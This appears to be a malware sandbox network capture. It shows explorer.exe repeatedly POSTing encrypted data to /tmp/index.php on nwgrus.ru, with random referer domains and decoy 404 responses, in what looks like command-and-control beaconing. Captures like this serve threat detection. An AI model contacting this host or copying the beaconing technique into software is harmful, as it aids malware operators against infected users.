                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.449738190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:37.906579971 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://hdugujrhcjt.org/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 258
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:37.906611919 CEST258OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 3b 0f b3 9b
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu;TW}Q{64z'L1=*XV`XDK@RY2aBa&,s+M\[8(dY Q@-Ejfgmd@'}Ik
                                                                Oct 12, 2024 23:27:39.375077009 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:27:39 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.449739190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:39.386974096 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://yqqseuuafdwk.org/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 254
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:39.386974096 CEST254OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 33 19 dd a5
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu3Z~Q\=Td0}4a^|h\#C-*f#;mc*Nu,RS^k;\ZA&%f0dA[{dF^\d
                                                                Oct 12, 2024 23:27:40.760502100 CEST137INHTTP/1.1 200 OK
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:27:40 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.449740190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:40.770448923 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://pkgsugfsxnjdsjfs.com/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 206
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:40.770503998 CEST206OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 2a 4a d2 ba
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu*JRSdjNq?;Xez=O0REKVA~dD&QvDImWDQi
                                                                Oct 12, 2024 23:27:42.131206036 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:27:41 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.449741190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:42.146588087 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://rwtmirjlqyc.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 247
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:42.146657944 CEST247OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 73 06 a7 ae
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vusRqxIj?y0RL_y~0d,M=v9.P[&!F<S0e0<x!x]9GZrpWQ5TA<FqesPx
                                                                Oct 12, 2024 23:27:43.503515005 CEST137INHTTP/1.1 200 OK
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:27:43 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.449742190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:43.513222933 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://qgmuajpjvyrttvq.org/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 200
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:43.513248920 CEST200OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 44 57 fe ee
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuDW<hKweZ_c-2-Cl];v_$+'8Q#Sq(0iB\C)iuXB
                                                                Oct 12, 2024 23:27:44.876148939 CEST137INHTTP/1.1 200 OK
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:27:44 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.449743190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:44.890516996 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://pxoxujlnkixexhr.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 277
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:44.890553951 CEST277OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 53 29 fa 89
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuS)n\g[15`q|?\6`GXIxc;KTyM($KTRV9[<o')Y.-PAHu[WJI@&
                                                                Oct 12, 2024 23:27:46.242913961 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:27:45 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.449744190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:46.255208969 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://kklpocdpdsv.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 358
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:46.255251884 CEST358OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 62 32 a5 ea
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vub2[DCL</cd9\(xnwYV5|LG2RJi32P^(V=[9o3(R~yPhI+M6k\/7 Q
                                                                Oct 12, 2024 23:27:47.657882929 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:27:47 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.449745190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:47.668030024 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://mubqagferfk.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 319
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:47.668064117 CEST319OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 20 49 d7 a0
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu IN9zjaCX rGD'*&tZ+O~+3Xz_{QECOoRLJa\dq^1U'BuN2,l
                                                                Oct 12, 2024 23:27:49.038738966 CEST137INHTTP/1.1 200 OK
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:27:48 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.449746190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:49.048058987 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://imnnydowlgvnht.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 365
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:49.048110962 CEST365OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 60 08 cf 8d
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu`UOKO1A+ =YnPVO.|0CE@a/kr<{\6Qb66+=M4&b~#A(qmK"10
                                                                Oct 12, 2024 23:27:50.401794910 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:27:50 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.449747190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:50.411030054 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://jodccroecnfoy.com/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 346
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:50.411051989 CEST346OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 27 58 e8 96
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu'Xh(^OI?n9NtBLR'P!FxyF6L#2<}1/ze3+WTbky>2v[XiX_w
                                                                Oct 12, 2024 23:27:51.780636072 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:27:51 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.449748190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:51.789321899 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://nsmlwxtdmapgbt.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 204
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:51.789339066 CEST204OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 2e 2a da be
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu.*q:wgT \-coq]/n[?Hto2Wx5-n~2x9xTnhk0
                                                                Oct 12, 2024 23:27:53.491604090 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:27:52 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 